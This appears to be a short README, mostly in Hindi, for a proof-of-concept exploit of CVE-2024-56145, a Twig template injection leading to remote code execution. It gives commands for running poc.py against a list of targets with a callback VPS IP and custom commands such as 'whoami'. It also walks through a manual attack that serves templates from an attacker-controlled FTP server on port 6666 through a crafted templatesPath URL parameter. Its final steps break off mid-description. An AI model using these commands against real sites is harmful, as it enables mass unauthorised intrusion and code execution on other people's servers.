
CVE-2024-56145 SSTI से RCE - twig टेम्पलेट्स
fuser -k 6666/tcp
python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200
कस्टम कमांड का उपयोग इस प्रकार किया जा सकता है python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami"
-i आपका आईपी या आपका VPS आईपी है (ipconfig / ifconfig चलाकर उसका उपयोग करें।
जैसे - python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t 200
अब क्या? आपके पास कमजोर लक्ष्य हैं लेकिन और अधिक खेलना चाहते हैं? तो मैंने poc2.py जोड़ा है जो लक्ष्य के विरुद्ध मैन्युअल परीक्षण के लिए है, यह कैसे करें? करें
fuser -k 6666/tcp1. Run poc2.py (port 6666 started as FTP).
2. Open the browser yourtarget.com/?--templatesPath=ftp://VPS-IP:6666/
3. you will see -

द्वारा लिखित Chirag Artani (https://x.com/Chirag99Artani)